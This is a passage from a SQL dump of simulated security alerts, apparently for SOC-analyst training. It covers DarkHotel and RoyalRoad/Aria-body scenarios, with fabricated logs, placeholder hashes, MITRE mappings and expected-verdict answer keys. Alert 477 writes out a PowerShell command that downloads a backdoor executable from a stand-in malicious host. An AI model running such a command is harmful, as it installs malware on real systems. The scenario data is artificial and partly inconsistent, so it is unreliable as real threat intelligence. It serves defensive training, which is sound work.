compromised device.\"}},{\"id\":\"artifact_3\",\"type\":\"filename\",\"value\":\"C:\\\\Windows\\\\System32\\\\tapaoux.dll\",\"is_critical\":true,\"osint_result\":{\"source\":\"Malware Analysis Report\",\"verdict\":\"malicious\",\"details\":\"Tapaoux malware DLL used for persistence.\"}},{\"id\":\"artifact_4\",\"type\":\"hash\",\"value\":\"5d41402abc4b2a76b9719d911017c592\",\"is_critical\":true,\"osint_result\":{\"source\":\"Hash Lookup Service\",\"verdict\":\"malicious\",\"details\":\"Hash associated with Tapaoux malware variant.\"}},{\"id\":\"artifact_5\",\"type\":\"username\",\"value\":\"compromised_user\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal User Directory\",\"verdict\":\"suspicious\",\"details\":\"User account suspected to be compromised.\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True Positive\",\"expected_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"collect_forensics\",\"escalate\"]}', 'Intermediate', 'MAL', 1, 0, NULL, NULL, NULL, '{\"tool\":\"SIEM\",\"evidence\":{\"events\":[{\"timestamp\":\"2026-02-01T20:32:19.082Z\",\"source\":\"/var/ossec/logs/alerts/alerts.json\",\"event_code\":\"Rule: 1002\",\"message\":\"File integrity changed for /etc/passwd. Checksum mismatch.\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-05T14:48:00Z\\\",\\\"event_id\\\":\\\"4624\\\",\\\"source_ip\\\":\\\"203.0.113.45\\\",\\\"target_ip\\\":\\\"10.0.15.21\\\",\\\"user\\\":\\\"compromised_user\\\",\\\"file_path\\\":\\\"C:\\\\\\\\Windows\\\\\\\\System32\\\\\\\\tapaoux.dll\\\",\\\"file_hash\\\":\\\"5d41402abc4b2a76b9719d911017c592\\\",\\\"action\\\":\\\"Added to startup\\\",\\\"registry_key_modified\\\":\\\"HKLM\\\\\\\\Software\\\\\\\\Microsoft\\\\\\\\Windows\\\\\\\\CurrentVersion\\\\\\\\Run\\\\\\\\TapaouxService\\\"}\"},{\"timestamp\":\"2026-02-01T20:31:19.082Z\",\"source\":\"/var/ossec/logs/alerts/alerts.json\",\"event_code\":\"Rule: 1002\",\"message\":\"File integrity changed for /etc/passwd. Checksum mismatch. [Repeated event count: 1]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-05T14:48:00Z\\\",\\\"event_id\\\":\\\"4624\\\",\\\"source_ip\\\":\\\"203.0.113.45\\\",\\\"target_ip\\\":\\\"10.0.15.21\\\",\\\"user\\\":\\\"compromised_user\\\",\\\"file_path\\\":\\\"C:\\\\\\\\Windows\\\\\\\\System32\\\\\\\\tapaoux.dll\\\",\\\"file_hash\\\":\\\"5d41402abc4b2a76b9719d911017c592\\\",\\\"action\\\":\\\"Added to startup\\\",\\\"registry_key_modified\\\":\\\"HKLM\\\\\\\\Software\\\\\\\\Microsoft\\\\\\\\Windows\\\\\\\\CurrentVersion\\\\\\\\Run\\\\\\\\TapaouxService\\\"}\"},{\"timestamp\":\"2026-02-01T20:30:19.082Z\",\"source\":\"/var/ossec/logs/alerts/alerts.json\",\"event_code\":\"Rule: 1002\",\"message\":\"File integrity changed for /etc/passwd. Checksum mismatch. [Repeated event count: 2]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-05T14:48:00Z\\\",\\\"event_id\\\":\\\"4624\\\",\\\"source_ip\\\":\\\"203.0.113.45\\\",\\\"target_ip\\\":\\\"10.0.15.21\\\",\\\"user\\\":\\\"compromised_user\\\",\\\"file_path\\\":\\\"C:\\\\\\\\Windows\\\\\\\\System32\\\\\\\\tapaoux.dll\\\",\\\"file_hash\\\":\\\"5d41402abc4b2a76b9719d911017c592\\\",\\\"action\\\":\\\"Added to startup\\\",\\\"registry_key_modified\\\":\\\"HKLM\\\\\\\\Software\\\\\\\\Microsoft\\\\\\\\Windows\\\\\\\\CurrentVersion\\\\\\\\Run\\\\\\\\TapaouxService\\\"}\"},{\"timestamp\":\"2026-02-01T20:29:19.082Z\",\"source\":\"/var/ossec/logs/alerts/alerts.json\",\"event_code\":\"Rule: 1002\",\"message\":\"File integrity changed for /etc/passwd. Checksum mismatch. [Repeated event count: 3]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-05T14:48:00Z\\\",\\\"event_id\\\":\\\"4624\\\",\\\"source_ip\\\":\\\"203.0.113.45\\\",\\\"target_ip\\\":\\\"10.0.15.21\\\",\\\"user\\\":\\\"compromised_user\\\",\\\"file_path\\\":\\\"C:\\\\\\\\Windows\\\\\\\\System32\\\\\\\\tapaoux.dll\\\",\\\"file_hash\\\":\\\"5d41402abc4b2a76b9719d911017c592\\\",\\\"action\\\":\\\"Added to startup\\\",\\\"registry_key_modified\\\":\\\"HKLM\\\\\\\\Software\\\\\\\\Microsoft\\\\\\\\Windows\\\\\\\\CurrentVersion\\\\\\\\Run\\\\\\\\TapaouxService\\\"}\"},{\"timestamp\":\"2026-02-01T20:28:19.082Z\",\"source\":\"/var/ossec/logs/alerts/alerts.json\",\"event_code\":\"Rule: 1002\",\"message\":\"File integrity changed for /etc/passwd. Checksum mismatch. [Repeated event count: 4]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-05T14:48:00Z\\\",\\\"event_id\\\":\\\"4624\\\",\\\"source_ip\\\":\\\"203.0.113.45\\\",\\\"target_ip\\\":\\\"10.0.15.21\\\",\\\"user\\\":\\\"compromised_user\\\",\\\"file_path\\\":\\\"C:\\\\\\\\Windows\\\\\\\\System32\\\\\\\\tapaoux.dll\\\",\\\"file_hash\\\":\\\"5d41402abc4b2a76b9719d911017c592\\\",\\\"action\\\":\\\"Added to startup\\\",\\\"registry_key_modified\\\":\\\"HKLM\\\\\\\\Software\\\\\\\\Microsoft\\\\\\\\Windows\\\\\\\\CurrentVersion\\\\\\\\Run\\\\\\\\TapaouxService\\\"}\"}],\"query\":\"index=main source=\\\"/var/ossec/logs/alerts/alerts.json\\\" | head 100\"}}', 0),
(474, 'Unauthorized Credential Access Attempt', 'high', 'Authentication logs', 'DarkHotel APT group attempts to harvest credentials from a compromised device, aiming to move laterally and access additional systems within the network. The attack was detected through unusual login attempts from an external IP address using a compromised internal account.', 'Lateral Movement', 'T1078.001 - Valid Accounts: Default Accounts', 1, 'new', NULL, '{\"timestamp\":\"2023-10-20T14:23:45Z\",\"event_id\":\"4625\",\"logon_type\":\"3\",\"user\":\"compromised_user\",\"source_ip\":\"203.0.113.45\",\"destination_ip\":\"192.168.1.15\",\"status\":\"FAILED\",\"failure_reason\":\"Unknown user name or bad password\",\"target_machine\":\"WIN-DC01\",\"hash\":\"e4d909c290d0fb1ca068ffaddf22cbd0\",\"filename\":\"darkhotel_tool.exe\"}', '2026-01-05 03:04:49', '2026-02-14 16:52:12', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"203.0.113.45\",\"is_critical\":true,\"osint_result\":{\"source\":\"Threat Intelligence Feed\",\"verdict\":\"malicious\",\"details\":\"IP associated with DarkHotel APT activities.\"}},{\"id\":\"artifact_2\",\"type\":\"username\",\"value\":\"compromised_user\",\"is_critical\":true,\"osint_result\":{\"source\":\"Internal Security Logs\",\"verdict\":\"suspicious\",\"details\":\"Unusual access patterns detected.\"}},{\"id\":\"artifact_3\",\"type\":\"hash\",\"value\":\"e4d909c290d0fb1ca068ffaddf22cbd0\",\"is_critical\":true,\"osint_result\":{\"source\":\"Malware Analysis Platform\",\"verdict\":\"malicious\",\"details\":\"Known hash for DarkHotel credential harvesting tool.\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True Positive\",\"expected_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\",\"escalate\"]}', 'advanced', 'TI', 1, 0, NULL, NULL, NULL, '{\"tool\":\"Identity\",\"evidence\":{\"user\":{\"username\":\"jdoe\",\"display_name\":\"John Doe\",\"department\":\"Finance\",\"manager\":\"Jane Smith\"},\"risk_score\":85,\"recent_activity\":[{\"action\":\"Login Success\",\"ip\":\"10.0.0.5\",\"location\":\"New York, US\",\"time\":\"09:00 AM\"},{\"action\":\"Password Reset Request\",\"ip\":\"192.168.1.5\",\"location\":\"New York, US\",\"time\":\"09:05 AM\"},{\"action\":\"Login Failed\",\"ip\":\"203.0.113.99\",\"location\":\"Moscow, RU\",\"time\":\"02:00 AM\",\"flag\":true}]}}', 0),
(475, 'Exfiltration of Sensitive Data', 'critical', 'Data loss prevention alerts', 'The final phase of the attack involves exfiltrating sensitive information from the executive\'s device to an external server controlled by DarkHotel, completing their malicious objectives.', 'Exfiltration', 'T1048.003 - Exfiltration Over Unencrypted/Obfuscated Non-C2 Protocol', 1, 'resolved', NULL, '{\"timestamp\":\"2023-10-05T14:23:45.123Z\",\"event_type\":\"data_exfiltration\",\"source_ip\":\"10.0.0.25\",\"destination_ip\":\"203.0.113.45\",\"destination_port\":\"8080\",\"protocol\":\"HTTP\",\"username\":\"jdoe_exec\",\"filename\":\"Executive_Report_Q3_2023.pdf\",\"file_hash\":\"d41d8cd98f00b204e9800998ecf8427e\",\"alert_source\":\"DLP\",\"threat_actor\":\"DarkHotel\",\"external_server\":\"malicious-server.example.com\"}', '2026-01-05 03:04:49', '2026-02-16 18:20:30', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"10.0.0.25\",\"is_critical\":false,\"osint_result\":{\"source\":\"internal_network\",\"verdict\":\"internal\",\"details\":\"Internal IP address of the source device.\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"203.0.113.45\",\"is_critical\":true,\"osint_result\":{\"source\":\"threat_intelligence\",\"verdict\":\"malicious\",\"details\":\"IP address associated with DarkHotel APT group.\"}},{\"id\":\"artifact_3\",\"type\":\"filename\",\"value\":\"Executive_Report_Q3_2023.pdf\",\"is_critical\":false,\"osint_result\":{\"source\":\"file_analysis\",\"verdict\":\"suspicious\",\"details\":\"Sensitive document containing executive data.\"}},{\"id\":\"artifact_4\",\"type\":\"hash\",\"value\":\"d41d8cd98f00b204e9800998ecf8427e\",\"is_critical\":true,\"osint_result\":{\"source\":\"virus_total\",\"verdict\":\"malicious\",\"details\":\"File hash matches known malicious files used by DarkHotel.\"}},{\"id\":\"artifact_5\",\"type\":\"domain\",\"value\":\"malicious-server.example.com\",\"is_critical\":true,\"osint_result\":{\"source\":\"domain_reputation\",\"verdict\":\"malicious\",\"details\":\"Domain known to be used by DarkHotel for data exfiltration.\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True Positive\",\"expected_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"collect_forensics\",\"escalate\"]}', 'Advanced', 'DLP', 1, 0, NULL, NULL, NULL, '{\"tool\":\"SIEM\",\"evidence\":{\"events\":[{\"timestamp\":\"2026-02-01T20:32:19.084Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-05T14:23:45.123Z\\\",\\\"event_type\\\":\\\"data_exfiltration\\\",\\\"source_ip\\\":\\\"10.0.0.25\\\",\\\"destination_ip\\\":\\\"203.0.113.45\\\",\\\"destination_port\\\":\\\"8080\\\",\\\"protocol\\\":\\\"HTTP\\\",\\\"username\\\":\\\"jdoe_exec\\\",\\\"filename\\\":\\\"Executive_Report_Q3_2023.pdf\\\",\\\"file_hash\\\":\\\"d41d8cd98f00b204e9800998ecf8427e\\\",\\\"alert_source\\\":\\\"DLP\\\",\\\"threat_actor\\\":\\\"DarkHotel\\\",\\\"external_server\\\":\\\"malicious-server.example.com\\\"}\"},{\"timestamp\":\"2026-02-01T20:31:19.084Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 1]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-05T14:23:45.123Z\\\",\\\"event_type\\\":\\\"data_exfiltration\\\",\\\"source_ip\\\":\\\"10.0.0.25\\\",\\\"destination_ip\\\":\\\"203.0.113.45\\\",\\\"destination_port\\\":\\\"8080\\\",\\\"protocol\\\":\\\"HTTP\\\",\\\"username\\\":\\\"jdoe_exec\\\",\\\"filename\\\":\\\"Executive_Report_Q3_2023.pdf\\\",\\\"file_hash\\\":\\\"d41d8cd98f00b204e9800998ecf8427e\\\",\\\"alert_source\\\":\\\"DLP\\\",\\\"threat_actor\\\":\\\"DarkHotel\\\",\\\"external_server\\\":\\\"malicious-server.example.com\\\"}\"},{\"timestamp\":\"2026-02-01T20:30:19.084Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 2]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-05T14:23:45.123Z\\\",\\\"event_type\\\":\\\"data_exfiltration\\\",\\\"source_ip\\\":\\\"10.0.0.25\\\",\\\"destination_ip\\\":\\\"203.0.113.45\\\",\\\"destination_port\\\":\\\"8080\\\",\\\"protocol\\\":\\\"HTTP\\\",\\\"username\\\":\\\"jdoe_exec\\\",\\\"filename\\\":\\\"Executive_Report_Q3_2023.pdf\\\",\\\"file_hash\\\":\\\"d41d8cd98f00b204e9800998ecf8427e\\\",\\\"alert_source\\\":\\\"DLP\\\",\\\"threat_actor\\\":\\\"DarkHotel\\\",\\\"external_server\\\":\\\"malicious-server.example.com\\\"}\"},{\"timestamp\":\"2026-02-01T20:29:19.084Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 3]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-05T14:23:45.123Z\\\",\\\"event_type\\\":\\\"data_exfiltration\\\",\\\"source_ip\\\":\\\"10.0.0.25\\\",\\\"destination_ip\\\":\\\"203.0.113.45\\\",\\\"destination_port\\\":\\\"8080\\\",\\\"protocol\\\":\\\"HTTP\\\",\\\"username\\\":\\\"jdoe_exec\\\",\\\"filename\\\":\\\"Executive_Report_Q3_2023.pdf\\\",\\\"file_hash\\\":\\\"d41d8cd98f00b204e9800998ecf8427e\\\",\\\"alert_source\\\":\\\"DLP\\\",\\\"threat_actor\\\":\\\"DarkHotel\\\",\\\"external_server\\\":\\\"malicious-server.example.com\\\"}\"},{\"timestamp\":\"2026-02-01T20:28:19.084Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 4]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-05T14:23:45.123Z\\\",\\\"event_type\\\":\\\"data_exfiltration\\\",\\\"source_ip\\\":\\\"10.0.0.25\\\",\\\"destination_ip\\\":\\\"203.0.113.45\\\",\\\"destination_port\\\":\\\"8080\\\",\\\"protocol\\\":\\\"HTTP\\\",\\\"username\\\":\\\"jdoe_exec\\\",\\\"filename\\\":\\\"Executive_Report_Q3_2023.pdf\\\",\\\"file_hash\\\":\\\"d41d8cd98f00b204e9800998ecf8427e\\\",\\\"alert_source\\\":\\\"DLP\\\",\\\"threat_actor\\\":\\\"DarkHotel\\\",\\\"external_server\\\":\\\"malicious-server.example.com\\\"}\"}],\"query\":\"index=main source=\\\"/var/log/syslog\\\" | head 100\"}}', 0),
(476, 'Suspicious Email with Malicious RTF Attachment Detected', 'medium', 'Email Security Gateway', 'A spear-phishing email was detected targeting a regional government employee. The email contained a RoyalRoad RTF file, commonly used by Naikon APT to exploit vulnerabilities in Microsoft Word for initial access.', 'Phishing', 'T1566.001', 1, 'Closed', 1, '{\"timestamp\":\"2023-10-24T09:15:27Z\",\"email_id\":\"b7f9a85d-083f-4d6b-9c6f-f22a3fc1e9b1\",\"source_ip\":\"203.0.113.45\",\"destination_ip\":\"10.0.2.15\",\"sender_email\":\"attacker@maliciousdomain.com\",\"recipient_email\":\"employee@regionalgov.org\",\"subject\":\"Urgent: Review Attached Document\",\"attachment\":{\"filename\":\"important_document.rtf\",\"hash\":\"a4b9c78cb6f1a2b3d4e5f6a7b8c9d0e1\"},\"user_agent\":\"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/94.0.4606.81 Safari/537.36\"}', '2026-01-05 03:08:29', '2026-02-14 16:52:12', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"203.0.113.45\",\"is_critical\":true,\"osint_result\":{\"source\":\"Threat Intelligence Feeds\",\"verdict\":\"malicious\",\"details\":\"IP associated with Naikon APT activity.\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"10.0.2.15\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal Network\",\"verdict\":\"internal\",\"details\":\"Internal IP of recipient.\"}},{\"id\":\"artifact_3\",\"type\":\"email\",\"value\":\"attacker@maliciousdomain.com\",\"is_critical\":true,\"osint_result\":{\"source\":\"Email Reputation Service\",\"verdict\":\"malicious\",\"details\":\"Known phishing domain used by APT groups.\"}},{\"id\":\"artifact_4\",\"type\":\"email\",\"value\":\"employee@regionalgov.org\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal Directory\",\"verdict\":\"clean\",\"details\":\"Legitimate email of a regional government employee.\"}},{\"id\":\"artifact_5\",\"type\":\"hash\",\"value\":\"a4b9c78cb6f1a2b3d4e5f6a7b8c9d0e1\",\"is_critical\":true,\"osint_result\":{\"source\":\"Malware Analysis Platform\",\"verdict\":\"malicious\",\"details\":\"Hash associated with RoyalRoad exploit documents.\"}},{\"id\":\"artifact_6\",\"type\":\"filename\",\"value\":\"important_document.rtf\",\"is_critical\":true,\"osint_result\":{\"source\":\"File Analysis\",\"verdict\":\"malicious\",\"details\":\"Filename commonly used in spear-phishing campaigns.\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True Positive\",\"expected_actions\":[\"block_ip\",\"block_hash\",\"collect_forensics\",\"escalate\"]}', 'Beginner', 'TI', 1, 0, NULL, NULL, NULL, '{\"tool\":\"Mail\",\"evidence\":{\"headers\":{\"from\":\"urgent@support-microsoft-update.com\",\"to\":\"employee@company.com\",\"subject\":\"Suspicious Email with Malicious RTF Attachment Detected\",\"date\":\"2026-02-01T20:32:19.085Z\",\"x-mailer\":\"PHPMailer 6.0\"},\"attachments\":[{\"name\":\"invoice_feb.pdf.exe\",\"size\":\"1.2MB\",\"type\":\"application/x-msdos-program\",\"verdict\":\"Malicious\"}],\"body_preview\":\"Dear User, please check the attached invoice immediately...\",\"security_check\":\"FAIL - SPF/DKIM Mismatch\"}}', 0);
INSERT INTO `alerts` (`id`, `title`, `severity`, `source`, `details`, `alert_type`, `mitre_technique`, `real_world_example`, `status`, `assigned_to`, `raw_log`, `created_at`, `updated_at`, `playbook_solution`, `difficulty`, `path_code`, `min_level`, `is_ai_generated`, `sector_code`, `created_by`, `organization_id`, `simulation_data`, `is_archived`) VALUES
(477, 'Execution of Malicious Payload via RoyalRoad Exploit', 'high', 'Endpoint Detection and Response (EDR)', 'Upon opening the RTF document, the RoyalRoad exploit triggers, executing a script that downloads the Aria-body backdoor onto the target\'s system.', 'Malware Execution', 'T1203: Exploitation for Client Execution', 1, 'resolved', 34, '{\"timestamp\":\"2023-10-15T14:22:31Z\",\"event_id\":\"EDR-456789\",\"source_ip\":\"203.0.113.15\",\"destination_ip\":\"10.0.0.25\",\"user\":\"jdoe\",\"file_name\":\"malicious_document.rtf\",\"file_hash\":\"d41d8cd98f00b204e9800998ecf8427e\",\"process_executed\":\"powershell.exe -Command Invoke-WebRequest -Uri http://malicious-site.com/aria-body.exe -OutFile C:\\\\Temp\\\\aria-body.exe\",\"malware_hash\":\"4a8a08f09d37b73795649038408b5f33\",\"action_taken\":\"Quarantine\"}', '2026-01-05 03:08:29', '2026-02-14 16:52:12', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"203.0.113.15\",\"is_critical\":true,\"osint_result\":{\"source\":\"ThreatIntelDB\",\"verdict\":\"malicious\",\"details\":\"IP associated with known APT campaigns.\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"10.0.0.25\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal\",\"verdict\":\"internal\",\"details\":\"Internal network IP.\"}},{\"id\":\"artifact_3\",\"type\":\"filename\",\"value\":\"malicious_document.rtf\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal\",\"verdict\":\"suspicious\",\"details\":\"File involved in RoyalRoad exploit delivery.\"}},{\"id\":\"artifact_4\",\"type\":\"hash\",\"value\":\"d41d8cd98f00b204e9800998ecf8427e\",\"is_critical\":false,\"osint_result\":{\"source\":\"VirusTotal\",\"verdict\":\"malicious\",\"details\":\"Hash linked to malicious RTF documents.\"}},{\"id\":\"artifact_5\",\"type\":\"hash\",\"value\":\"4a8a08f09d37b73795649038408b5f33\",\"is_critical\":true,\"osint_result\":{\"source\":\"VirusTotal\",\"verdict\":\"malicious\",\"details\":\"Hash associated with Aria-body malware.\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True Positive\",\"expected_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"collect_forensics\",\"escalate\"]}', 'Intermediate', 'MAL', 1, 0, NULL, NULL, NULL, '{\"tool\":\"EDR\",\"evidence\":{\"hostname\":\"WORKSTATION-01\",\"os\":\"Windows 10 Enterprise\",\"agent_version\":\"7.12.0\",\"process_tree\":[{\"id\":100,\"name\":\"explorer.exe\",\"pid\":4520,\"user\":\"jdoe\",\"cmd\":\"explorer.exe\",\"integrity\":\"Medium\",\"children\":[101]},{\"id\":101,\"name\":\"powershell.exe\",\"pid\":5100,\"user\":\"jdoe\",\"cmd\":\"powershell.exe -nop -enc AAB...\",\"integrity\":\"High\",\"children\":[102],\"highlight\":true},{\"id\":102,\"name\":\"conhost.exe\",\"pid\":5101,\"user\":\"jdoe\",\"cmd\":\"conhost.exe\",\"integrity\":\"High\",\"children\":[]}],\"network_connections\":[{\"pid\":5100,\"remote_ip\":\"203.0.113.55\",\"port\":443,\"state\":\"ESTABLISHED\",\"process\":\"powershell.exe\"}]}}', 0),
(478, 'Aria-body Backdoor Establishes Persistence', 'medium', 'System Logs', 'The Aria-body backdoor has been detected establishing persistence by creating a scheduled task. This ensures the malware runs at system startup, maintaining access on the compromised machine.', 'Persistence Mechanism', 'T1053.005 - Scheduled Task/Job', 1, 'new', NULL, '{\"timestamp\":\"2023-10-05T14:32:07Z\",\"event_id\":4698,\"task_name\":\"\\\\Microsoft\\\\Windows\\\\Update\\\\Aria-body\",\"task_action\":\"Create\",\"task_author\":\"SYSTEM\",\"task_trigger\":\"At startup\",\"executed_by\":\"192.168.1.15\",\"malware_hash\":\"5d41402abc4b2a76b9719d911017c592\",\"filename\":\"aria-body.exe\",\"user\":\"compromised_user\",\"source_ip\":\"203.0.113.45\"}', '2026-01-05 03:08:29', '2026-02-14 16:52:12', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"192.168.1.15\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal Network\",\"verdict\":\"internal\",\"details\":\"Local IP address within the internal network.\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"203.0.113.45\",\"is_critical\":true,\"osint_result\":{\"source\":\"Public Threat Intelligence\",\"verdict\":\"malicious\",\"details\":\"IP address associated with known malicious activities.\"}},{\"id\":\"artifact_3\",\"type\":\"hash\",\"value\":\"5d41402abc4b2a76b9719d911017c592\",\"is_critical\":true,\"osint_result\":{\"source\":\"VirusTotal\",\"verdict\":\"malicious\",\"details\":\"Hash identified as a variant of the Aria-body malware.\"}},{\"id\":\"artifact_4\",\"type\":\"filename\",\"value\":\"aria-body.exe\",\"is_critical\":true,\"osint_result\":{\"source\":\"Public Threat Intelligence\",\"verdict\":\"malicious\",\"details\":\"File associated with Aria-body backdoor malware.\"}},{\"id\":\"artifact_5\",\"type\":\"username\",\"value\":\"compromised_user\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal Network\",\"verdict\":\"suspicious\",\"details\":\"User account potentially compromised and used for unauthorized activities.\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True Positive\",\"expected_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"collect_forensics\"]}', 'Beginner', 'MAL', 1, 0, NULL, NULL, NULL, '{\"tool\":\"SIEM\",\"evidence\":{\"events\":[{\"timestamp\":\"2026-02-01T20:32:19.087Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-05T14:32:07Z\\\",\\\"event_id\\\":4698,\\\"task_name\\\":\\\"\\\\\\\\Microsoft\\\\\\\\Windows\\\\\\\\Update\\\\\\\\Aria-body\\\",\\\"task_action\\\":\\\"Create\\\",\\\"task_author\\\":\\\"SYSTEM\\\",\\\"task_trigger\\\":\\\"At startup\\\",\\\"executed_by\\\":\\\"192.168.1.15\\\",\\\"malware_hash\\\":\\\"5d41402abc4b2a76b9719d911017c592\\\",\\\"filename\\\":\\\"aria-body.exe\\\",\\\"user\\\":\\\"compromised_user\\\",\\\"source_ip\\\":\\\"203.0.113.45\\\"}\"},{\"timestamp\":\"2026-02-01T20:31:19.087Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 1]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-05T14:32:07Z\\\",\\\"event_id\\\":4698,\\\"task_name\\\":\\\"\\\\\\\\Microsoft\\\\\\\\Windows\\\\\\\\Update\\\\\\\\Aria-body\\\",\\\"task_action\\\":\\\"Create\\\",\\\"task_author\\\":\\\"SYSTEM\\\",\\\"task_trigger\\\":\\\"At startup\\\",\\\"executed_by\\\":\\\"192.168.1.15\\\",\\\"malware_hash\\\":\\\"5d41402abc4b2a76b9719d911017c592\\\",\\\"filename\\\":\\\"aria-body.exe\\\",\\\"user\\\":\\\"compromised_user\\\",\\\"source_ip\\\":\\\"203.0.113.45\\\"}\"},{\"timestamp\":\"2026-02-01T20:30:19.087Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 2]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-05T14:32:07Z\\\",\\\"event_id\\\":4698,\\\"task_name\\\":\\\"\\\\\\\\Microsoft\\\\\\\\Windows\\\\\\\\Update\\\\\\\\Aria-body\\\",\\\"task_action\\\":\\\"Create\\\",\\\"task_author\\\":\\\"SYSTEM\\\",\\\"task_trigger\\\":\\\"At startup\\\",\\\"executed_by\\\":\\\"192.168.1.15\\\",\\\"malware_hash\\\":\\\"5d41402abc4b2a76b9719d911017c592\\\",\\\"filename\\\":\\\"aria-body.exe\\\",\\\"user\\\":\\\"compromised_user\\\",\\\"source_ip\\\":\\\"203.0.113.45\\\"}\"},{\"timestamp\":\"2026-02-01T20:29:19.087Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 3]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-05T14:32:07Z\\\",\\\"event_id\\\":4698,\\\"task_name\\\":\\\"\\\\\\\\Microsoft\\\\\\\\Windows\\\\\\\\Update\\\\\\\\Aria-body\\\",\\\"task_action\\\":\\\"Create\\\",\\\"task_author\\\":\\\"SYSTEM\\\",\\\"task_trigger\\\":\\\"At startup\\\",\\\"executed_by\\\":\\\"192.168.1.15\\\",\\\"malware_hash\\\":\\\"5d41402abc4b2a76b9719d911017c592\\\",\\\"filename\\\":\\\"aria-body.exe\\\",\\\"user\\\":\\\"compromised_user\\\",\\\"source_ip\\\":\\\"203.0.113.45\\\"}\"},{\"timestamp\":\"2026-02-01T20:28:19.087Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 4]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-05T14:32:07Z\\\",\\\"event_id\\\":4698,\\\"task_name\\\":\\\"\\\\\\\\Microsoft\\\\\\\\Windows\\\\\\\\Update\\\\\\\\Aria-body\\\",\\\"task_action\\\":\\\"Create\\\",\\\"task_author\\\":\\\"SYSTEM\\\",\\\"task_trigger\\\":\\\"At 